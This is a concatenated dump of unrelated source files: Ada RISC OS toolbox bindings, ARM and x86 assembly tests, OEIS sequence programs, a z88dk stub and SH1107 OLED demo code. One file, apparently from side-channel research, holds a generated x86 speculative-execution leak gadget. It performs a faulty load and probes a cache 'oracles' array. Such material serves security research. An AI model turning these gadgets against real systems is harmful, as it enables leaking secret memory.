Toolbox_Event_Slider_ValueChanged : constant ToolBox_Event_Code_Type := 16#82886#; Toolbox_Event_Draggable_DragStarted : constant ToolBox_Event_Code_Type := 16#82887#; Toolbox_Event_Draggable_DragEnded : constant ToolBox_Event_Code_Type := 16#82888#; Toolbox_Event_PopUp_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#8288B#; Toolbox_Event_Adjuster_Clicked : constant ToolBox_Event_Code_Type := 16#8288C#; Toolbox_Event_NumberRange_ValueChanged : constant ToolBox_Event_Code_Type := 16#8288D#; Toolbox_Event_StringSet_ValueChanged : constant ToolBox_Event_Code_Type := 16#8288E#; Toolbox_Event_StringSet_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#8288F#; Toolbox_Event_Window_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#82890#; ToolBox_Event_Quit : constant ToolBox_Event_Code_Type := 16#82A91#; Toolbox_Event_ScrollList_Selection : constant ToolBox_Event_Code_Type := 16#140181#; Toolbox_Event_Scrollbar_PositionChanged : constant ToolBox_Event_Code_Type := 16#140183#; Toolbox_Event_ToolAction_ButtonClicked : constant ToolBox_Event_Code_Type := 16#140140#; TreeView_SWIBase : constant ToolBox_Event_Code_Type := 16#140280#; TreeView_EventBase : constant ToolBox_Event_Code_Type := TreeView_SWIBase; Toolbox_Event_TreeViewNodeSelected : constant ToolBox_Event_Code_Type := TreeView_EventBase + 0; Toolbox_Event_TreeViewNodeExpanded : constant ToolBox_Event_Code_Type := TreeView_EventBase + 1; Toolbox_Event_TreeViewNodeRenamed : constant ToolBox_Event_Code_Type := TreeView_EventBase + 2; Toolbox_Event_TreeViewNodeDataRequired : constant ToolBox_Event_Code_Type := TreeView_EventBase + 3; Toolbox_Event_TreeViewNodeDragged : constant ToolBox_Event_Code_Type := TreeView_EventBase + 4; type Object_ID is new Integer; type Component_ID is new Integer; subtype Error_Code_Type is Integer; Error_Escape : constant Error_Code_Type := 16#11#; Error_Bad_mode : constant Error_Code_Type := 16#19#; Error_Is_adir : constant Error_Code_Type := 16#A8#; Error_Types_dont_match : constant Error_Code_Type := 16#AF#; Error_Bad_rename : constant Error_Code_Type := 16#B0#; Error_Bad_copy : constant Error_Code_Type := 16#B1#; Error_Outside_file : constant Error_Code_Type := 16#B7#; Error_Access_violation : constant Error_Code_Type := 16#BD#; Error_Too_many_open_files : constant Error_Code_Type := 16#C0#; Error_Not_open_for_update : constant Error_Code_Type := 16#C1#; Error_File_open : constant Error_Code_Type := 16#C2#; Error_Object_locked : constant Error_Code_Type := 16#C3#; Error_Already_exists : constant Error_Code_Type := 16#C4#; Error_Bad_file_name : constant Error_Code_Type := 16#CC#; Error_File_not_found : constant Error_Code_Type := 16#D6#; Error_Syntax : constant Error_Code_Type := 16#DC#; Error_Channel : constant Error_Code_Type := 16#DE#; Error_End_of_file : constant Error_Code_Type := 16#DF#; Error_Buffer_Overflow : constant Error_Code_Type := 16#E4#; Error_Bad_filing_system_name : constant Error_Code_Type := 16#F8#; Error_Bad_key : constant Error_Code_Type := 16#FB#; Error_Bad_address : constant Error_Code_Type := 16#FC#; Error_Bad_string : constant Error_Code_Type := 16#FD#; Error_Bad_command : constant Error_Code_Type := 16#FE#; Error_Bad_mac_val : constant Error_Code_Type := 16#120#; Error_Bad_var_nam : constant Error_Code_Type := 16#121#; Error_Bad_var_type : constant Error_Code_Type := 16#122#; Error_Var_no_room : constant Error_Code_Type := 16#123#; Error_Var_cant_find : constant Error_Code_Type := 16#124#; Error_Var_too_long : constant Error_Code_Type := 16#125#; Error_Redirect_fail : constant Error_Code_Type := 16#140#; Error_Stack_full : constant Error_Code_Type := 16#141#; Error_Bad_hex : constant Error_Code_Type := 16#160#; Error_Bad_expr : constant Error_Code_Type := 16#161#; Error_Bad_bra : constant Error_Code_Type := 16#162#; Error_Stk_oflo : constant Error_Code_Type := 16#163#; Error_Miss_opn : constant Error_Code_Type := 16#164#; Error_Miss_opr : constant Error_Code_Type := 16#165#; Error_Bad_bits : constant Error_Code_Type := 16#166#; Error_Str_oflo : constant Error_Code_Type := 16#167#; Error_Bad_itm : constant Error_Code_Type := 16#168#; Error_Div_zero : constant Error_Code_Type := 16#169#; Error_Bad_base : constant Error_Code_Type := 16#16A#; Error_Bad_numb : constant Error_Code_Type := 16#16B#; Error_Numb_too_big : constant Error_Code_Type := 16#16C#; Error_Bad_claim_num : constant Error_Code_Type := 16#1A1#; Error_Bad_release : constant Error_Code_Type := 16#1A2#; Error_Bad_dev_no : constant Error_Code_Type := 16#1A3#; Error_Bad_dev_vec_rel : constant Error_Code_Type := 16#1A4#; Error_Bad_env_number : constant Error_Code_Type := 16#1B0#; Error_Cant_cancel_quit : constant Error_Code_Type := 16#1B1#; Error_Ch_dynam_cao : constant Error_Code_Type := 16#1C0#; Error_Ch_dynam_not_all_moved : constant Error_Code_Type := 16#1C1#; Error_Apl_wspace_in_use : constant Error_Code_Type := 16#1C2#; Error_Ram_fs_unchangeable : constant Error_Code_Type := 16#1C3#; Error_Oscli_long_line : constant Error_Code_Type := 16#1E0#; Error_Oscli_too_hard : constant Error_Code_Type := 16#1E1#; Error_Rc_exc : constant Error_Code_Type := 16#1E2#; Error_Sys_heap_full : constant Error_Code_Type := 16#1E3#; Error_Buff_overflow : constant Error_Code_Type := 16#1E4#; Error_Bad_time : constant Error_Code_Type := 16#1E5#; Error_No_such_swi : constant Error_Code_Type := 16#1E6#; Error_Unimplemented : constant Error_Code_Type := 16#1E7#; Error_Out_of_range : constant Error_Code_Type := 16#1E8#; Error_No_oscli_specials : constant Error_Code_Type := 16#1E9#; Error_Bad_parameters : constant Error_Code_Type := 16#1EA#; Error_Arg_repeated : constant Error_Code_Type := 16#1EB#; Error_Bad_read_sys_info : constant Error_Code_Type := 16#1EC#; Error_Cdat_stack_overflow : constant Error_Code_Type := 16#2C0#; Error_Cdat_buffer_overflow : constant Error_Code_Type := 16#2C1#; Error_Cdat_bad_field : constant Error_Code_Type := 16#2C2#; Error_Cant_start_application : constant Error_Code_Type := 16#600#; -- Toolbox errors Error_Tool_Action_Out_of_Memory : constant Error_Code_Type := 16#80E920#; Error_Tool_Action_Cant_Create_Icon : constant Error_Code_Type := 16#80E921#; Error_Tool_Action_Cant_Create_Object : constant Error_Code_Type := 16#80E922#; Exception_Tool_Action_Out_of_Memory : Exception; Exception_Tool_Action_Cant_Create_Icon : Exception; Exception_Tool_Action_Cant_Create_Object: Exception; Exception_Escape : Exception; Exception_Bad_mode : Exception; Exception_Is_adir : Exception; Exception_Types_dont_match : Exception; Exception_Bad_rename : Exception; Exception_Bad_copy : Exception; Exception_Outside_file : Exception; Exception_Access_violation : Exception; Exception_Too_many_open_files : Exception; Exception_Not_open_for_update : Exception; Exception_File_open : Exception; Exception_Object_locked : Exception; Exception_Already_exists : Exception; Exception_Bad_file_name : Exception; Exception_File_not_found : Exception; Exception_Syntax : Exception; Exception_Channel : Exception; Exception_End_of_file : Exception; Exception_Buffer_Overflow : Exception; Exception_Bad_filing_system_name : Exception; Exception_Bad_key : Exception; Exception_Bad_address : Exception; Exception_Bad_string : Exception; Exception_Bad_command : Exception; Exception_Bad_mac_val : Exception; Exception_Bad_var_nam : Exception; Exception_Bad_var_type : Exception; Exception_Var_no_room : Exception; Exception_Var_cant_find : Exception; Exception_Var_too_long : Exception; Exception_Redirect_fail : Exception; Exception_Stack_full : Exception; Exception_Bad_hex : Exception; Exception_Bad_expr : Exception; Exception_Bad_bra : Exception; Exception_Stk_oflo : Exception; Exception_Miss_opn : Exception; Exception_Miss_opr : Exception; Exception_Bad_bits : Exception; Exception_Str_oflo : Exception; Exception_Bad_itm : Exception; Exception_Div_zero : Exception; Exception_Bad_base : Exception; Exception_Bad_numb : Exception; Exception_Numb_too_big : Exception; Exception_Bad_claim_num : Exception; Exception_Bad_release : Exception; Exception_Bad_dev_no : Exception; Exception_Bad_dev_vec_rel : Exception; Exception_Bad_env_number : Exception; Exception_Cant_cancel_quit : Exception; Exception_Ch_dynam_cao : Exception; Exception_Ch_dynam_not_all_moved : Exception; Exception_Apl_wspace_in_use : Exception; Exception_Ram_fs_unchangeable : Exception; Exception_Oscli_long_line : Exception; Exception_Oscli_too_hard : Exception; Exception_Rc_exc : Exception; Exception_Sys_heap_full : Exception; Exception_Buff_overflow : Exception; Exception_Bad_time : Exception; Exception_No_such_swi : Exception; Exception_Unimplemented : Exception; Exception_Out_of_range : Exception; Exception_No_oscli_specials : Exception; Exception_Bad_parameters : Exception; Exception_Arg_repeated : Exception; Exception_Bad_read_sys_info : Exception; Exception_Cdat_stack_overflow : Exception; Exception_Cdat_buffer_overflow : Exception; Exception_Cdat_bad_field : Exception; Exception_Cant_start_application : Exception; Exception_Unknown_Error : Exception; procedure Raise_Error (Error : OSError_Access); -- -- Block filled in by the toolbox on WimpPoll -- type ToolBox_Id_Block_Type is record Ancestor_Id : Object_ID; Ancestor_Component: Component_ID; Parent_Id : Object_ID; Parent_Component : Component_ID; Self_Id : Object_ID; Self_Component : Component_ID; end record; pragma Convention (C, ToolBox_Id_Block_Type); type ToolBox_Id_Block_Pointer is access ToolBox_Id_Block_Type; type Toolbox_EventListener (E : ToolBox_Event_Code_Type; O : Object_ID; C : Component_ID) is abstract new Event_Listener(Toolbox) with record Event_Code : ToolBox_Event_Code_Type := E; Object : Object_ID := O; Component : Component_ID := C; ID_Block : ToolBox_Id_Block_Pointer; end record; type Toolbox_UserEventListener (E : ToolBox_Event_Code_Type; O : Object_ID; C : Component_ID) is abstract new Toolbox_EventListener (E,O,C) with record Event : Event_Pointer; end record; type Toolbox_Event_Header is record Size : System.Unsigned_Types.Unsigned; Reference_Number : Integer; Event_Code : System.Unsigned_Types.Unsigned; Flags : System.Unsigned_Types.Unsigned; end record; pragma Convention (C, Toolbox_Event_Header); Wimp_Block_Size : constant integer := 63; type Wimp_Block_Type is array (0 .. Wimp_Block_Size) of integer; type Wimp_Block_Pointer is access Wimp_Block_Type; Number_Of_Messages : integer := 0; Max_Number_Of_Messages : constant integer := 63; type Messages_List_Type is array (0 .. Max_Number_Of_Messages) of integer; type Messages_List_Pointer is access Messages_List_Type; type System_Sprite_Pointer is new Address; type Messages_Control_Block_Type is array (1 .. 6) of System.Unsigned_Types.Unsigned; type Messages_Handle_Type is access Messages_Control_Block_Type; end RASCAL.OS;

led.asm

Silvantica/Etch-A-Sketch

0

20046

<gh_stars>0 ; This file assumes "base.asm" and "delay.asm" are imported somewhere ; Enables GPIO output on GPIO27 ; This doesn't conflict with enable_buttons because we're using GPFSEL instead of ; GPHEN enable_led: push {r0-r1,lr} mov r0, BASE orr r0, GPIO_OFFSET ;r0 now equals 0x3F200000 ; Set bit 21 of GPFSEL2 to enable output on GPIO27 (see broadcom datasheet) mov r1,#1 lsl r1,#21 str r1,[r0,GPFSEL2_OFFSET] pop {r0-r1,pc} ; Blinks the LED enabled on GPIO27 blink_led: push {r0-r1,lr} mov r0, BASE orr r0, GPIO_OFFSET ;r0 now equals 0x3F200000 ; Turn the light on mov r1,#1 lsl r1,#27 str r1,[r0,GPSET0_OFFSET] ; Wait for a few milliseconds so we can see the blink push {r0} mov r0,#500 bl delay pop {r0} ; Turn the light off mov r1,#1 lsl r1,#27 str r1,[r0,GPCLR0_OFFSET] ; Wait for a few milliseconds so we can see that it's off push {r0} mov r0,#500 bl delay pop {r0} pop {r0-r1,pc}

testc/cputest/daadas.asm

krismuad/TOWNSEMU

124

246408

<gh_stars>100-1000 .386p ASSUME CS:CODE PUBLIC TEST_DAA PUBLIC TEST_DAS ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; EFLAGS_CF EQU 00001H EFLAGS_PF EQU 00004H EFLAGS_AF EQU 00010H EFLAGS_ZF EQU 00040H EFLAGS_SF EQU 00080H EFLAGS_TRAP EQU 00100H EFLAGS_IF EQU 00200H EFLAGS_DF EQU 00400H EFLAGS_OF EQU 00800H EFLAGS_IOPL EQU 03000H EFLAGS_NF EQU 04000H EFLAGS_RF EQU 10000H EFLAGS_VF EQU 20000H EFLAGS_ALIGN_CHECK EQU 40000H ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CODE SEGMENT ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; int TEST_DAA(unsigned int eax,unsigned int edx) TEST_DAA PROC PUSH EBP ; [EBP]=PrevEBP, [EBP+4]=EIP, [EIP+8]=EAX, [EIP+12]=EDX MOV EBP,ESP PUSHAD MOV EAX,[EBP+8] MOV EDX,[EBP+12] XOR AH,AH ADD AL,DL DAA PUSHFD POP EBX AND BL,EFLAGS_SF+EFLAGS_ZF+EFLAGS_PF+EFLAGS_CF+EFLAGS_AF MOV AH,BL AND EAX,0FFFFH MOV [EBP+8],EAX POPAD MOV EAX,[EBP+8] POP EBP RET TEST_DAA ENDP ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; int TEST_DAS(unsigned int eax,unsigned int edx) TEST_DAS PROC PUSH EBP ; [EBP]=PrevEBP, [EBP+4]=EIP, [EIP+8]=EAX, [EIP+12]=EDX MOV EBP,ESP PUSHAD MOV EAX,[EBP+8] MOV EDX,[EBP+12] XOR AH,AH SUB AL,DL DAS PUSHFD POP EBX AND BL,EFLAGS_SF+EFLAGS_ZF+EFLAGS_PF+EFLAGS_CF+EFLAGS_AF MOV AH,BL AND EAX,0FFFFH MOV [EBP+8],EAX POPAD MOV EAX,[EBP+8] POP EBP RET TEST_DAS ENDP ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CODE ENDS END

programs/oeis/143/A143536.asm

neoneye/loda

22

94379

; A143536: Triangle read by rows, T(n,k) = 1 if n is prime, 0 otherwise. ; 0,1,1,1,1,1,0,0,0,0,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0 lpb $0 add $1,1 sub $0,$1 lpe seq $1,10051 ; Characteristic function of primes: 1 if n is prime, else 0. mov $0,$1

libsrc/_DEVELOPMENT/stdio/c/sccz80/vasprintf_callee.asm

jpoikela/z88dk

640

14965

; int vasprintf(char **ptr, const char *format, void *arg) SECTION code_clib SECTION code_stdio PUBLIC vasprintf_callee EXTERN asm_vasprintf vasprintf_callee: pop af pop bc pop de exx pop de exx push af jp asm_vasprintf

Transynther/x86/_processed/NC/_zr_/i3-7100_9_0xca_notsx.log_21829_1236.asm

ljhsiun2/medusa

9

89115

<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r13 push %r8 push %rbp push %rcx push %rdi push %rdx push %rsi lea addresses_A_ht+0x10fb8, %rdi nop nop nop nop sub %r10, %r10 movb (%rdi), %r12b nop cmp %rbp, %rbp lea addresses_normal_ht+0x1ab18, %r13 nop nop nop and %r8, %r8 movw $0x6162, (%r13) add $27629, %r10 lea addresses_D_ht+0xe038, %rsi lea addresses_WT_ht+0xa7b8, %rdi nop nop xor %rdx, %rdx mov $20, %rcx rep movsw nop nop nop nop and $51885, %r8 lea addresses_WT_ht+0x26f8, %rsi clflush (%rsi) nop nop cmp %r8, %r8 mov $0x6162636465666768, %r10 movq %r10, %xmm3 vmovups %ymm3, (%rsi) nop nop add $26176, %rdi lea addresses_WT_ht+0x1b8e8, %rdi nop nop and %rsi, %rsi movb (%rdi), %r8b nop nop nop xor %rbp, %rbp lea addresses_WC_ht+0x58b8, %rdi nop nop nop nop cmp %r12, %r12 mov $0x6162636465666768, %r8 movq %r8, %xmm6 movups %xmm6, (%rdi) nop and %rsi, %rsi lea addresses_UC_ht+0x17138, %r13 nop nop nop cmp $56368, %rsi mov (%r13), %rbp nop nop nop cmp %rbp, %rbp lea addresses_WC_ht+0x14e74, %r8 clflush (%r8) nop nop mfence movw $0x6162, (%r8) nop inc %rcx pop %rsi pop %rdx pop %rdi pop %rcx pop %rbp pop %r8 pop %r13 pop %r12 pop %r10 ret .global s_faulty_load s_faulty_load: push %r14 push %r8 push %r9 push %rdi push %rdx // Faulty Load mov $0x6e53f300000008b8, %r9 sub $54180, %r14 mov (%r9), %edx lea oracles, %rdi and $0xff, %rdx shlq $12, %rdx mov (%rdi,%rdx,1), %rdx pop %rdx pop %rdi pop %r9 pop %r8 pop %r14 ret /* <gen_faulty_load> [REF] {'src': {'same': False, 'congruent': 0, 'NT': True, 'type': 'addresses_NC', 'size': 8, 'AVXalign': False}, 'OP': 'LOAD'} [Faulty Load] {'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_NC', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 1, 'NT': False, 'type': 'addresses_normal_ht', 'size': 2, 'AVXalign': False}} {'src': {'type': 'addresses_D_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 6, 'NT': False, 'type': 'addresses_WT_ht', 'size': 32, 'AVXalign': False}} {'src': {'same': False, 'congruent': 3, 'NT': False, 'type': 'addresses_WT_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_WC_ht', 'size': 16, 'AVXalign': False}} {'src': {'same': False, 'congruent': 5, 'NT': False, 'type': 'addresses_UC_ht', 'size': 8, 'AVXalign': False}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

programs/oeis/040/A040875.asm

neoneye/loda

22

90583

; A040875: Continued fraction for sqrt(906). ; 30,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60 sub $0,1 mod $0,2 mul $0,10 add $0,2 pow $0,2 div $0,26 mul $0,10 add $0,10

example_pico/src/demos.adb

hgrodriguez/sh1107

1

8594

--=========================================================================== -- -- This package is the implementation of the demo package showing examples -- for the SH1107 OLED controller -- --=========================================================================== -- -- Copyright 2022 (C) <NAME> -- -- SPDX-License-Identifier: BSD-3-Clause -- with HAL; with HAL.Bitmap; with HAL.Framebuffer; with RP.Timer; package body Demos is procedure Black_Background_White_Arrow (S : in out SH1107.SH1107_Screen); procedure White_Background_With_Black_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen); procedure Black_Background_With_White_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen); procedure White_Background_4_Black_Corners (S : in out SH1107.SH1107_Screen); procedure Black_Background_4_White_Corners (S : in out SH1107.SH1107_Screen); procedure Black_Background_White_Geometry (S : in out SH1107.SH1107_Screen); procedure White_Background_Black_Geometry (S : in out SH1107.SH1107_Screen); procedure White_Diagonal_Line_On_Black (S : in out SH1107.SH1107_Screen); procedure Black_Diagonal_Line_On_White (S : in out SH1107.SH1107_Screen); type Demo_Procedure is not null access procedure (S : in out SH1107.SH1107_Screen); Demos_Procedures : constant array (Demos_Available) of Demo_Procedure := (Demos.Black_Background_White_Arrow => (Black_Background_White_Arrow'Access), Demos.White_Background_With_Black_Rectangle_Full_Screen => ( White_Background_With_Black_Rectangle_Full_Screen'Access), Demos.Black_Background_With_White_Rectangle_Full_Screen => ( Black_Background_With_White_Rectangle_Full_Screen'Access), Demos.White_Background_4_Black_Corners => (White_Background_4_Black_Corners'Access), Demos.Black_Background_4_White_Corners => (Black_Background_4_White_Corners'Access), Demos.Black_Background_White_Geometry => (Black_Background_White_Geometry'Access), Demos.White_Background_Black_Geometry => (White_Background_Black_Geometry'Access), Demos.White_Diagonal_Line_On_Black => (White_Diagonal_Line_On_Black'Access), Demos.Black_Diagonal_Line_On_White => (Black_Diagonal_Line_On_White'Access) ); Another_Timer : RP.Timer.Delays; THE_LAYER : constant Positive := 1; Corner_0_0 : constant HAL.Bitmap.Point := (0, 0); Corner_1_1 : constant HAL.Bitmap.Point := (1, 1); Corner_0_127 : constant HAL.Bitmap.Point := (0, SH1107.THE_HEIGHT - 1); Corner_127_0 : constant HAL.Bitmap.Point := (SH1107.THE_WIDTH - 1, 0); Corner_127_127 : constant HAL.Bitmap.Point := (SH1107.THE_WIDTH - 1, SH1107.THE_HEIGHT - 1); My_Area : constant HAL.Bitmap.Rect := (Position => Corner_0_0, Width => SH1107.THE_WIDTH - 1, Height => SH1107.THE_HEIGHT - 1); My_Circle_Center : constant HAL.Bitmap.Point := (X => 64, Y => 38); My_Circle_Radius : constant Natural := 10; My_Rectangle : constant HAL.Bitmap.Rect := (Position => (X => 38, Y => 78), Width => 20, Height => 10); procedure Black_Background_White_Arrow (S : in out SH1107.SH1107_Screen) is Corners : constant HAL.Bitmap.Point_Array (1 .. 7) := ( 1 => (40, 118), 2 => (86, 118), 3 => (86, 60), 4 => (96, 60), 5 => (63, 10), 6 => (30, 60), 7 => (40, 60)); Start : HAL.Bitmap.Point; Stop : HAL.Bitmap.Point; My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); for N in Corners'First .. Corners'Last loop Start := Corners (N); if N = Corners'Last then Stop := Corners (1); else Stop := Corners (N + 1); end if; My_Hidden_Buffer.Draw_Line (Start, Stop); end loop; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_White_Arrow; procedure White_Background_With_Black_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Draw_Rect (Area => My_Area); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Background_With_Black_Rectangle_Full_Screen; procedure Black_Background_With_White_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Draw_Rect (Area => My_Area); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_With_White_Rectangle_Full_Screen; procedure White_Background_4_Black_Corners (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_0, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_1_1, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_127, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_0, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_127, Native => 0); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Background_4_Black_Corners; procedure Black_Background_4_White_Corners (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_0, Native => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_127, Native => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_0, Native => 1); 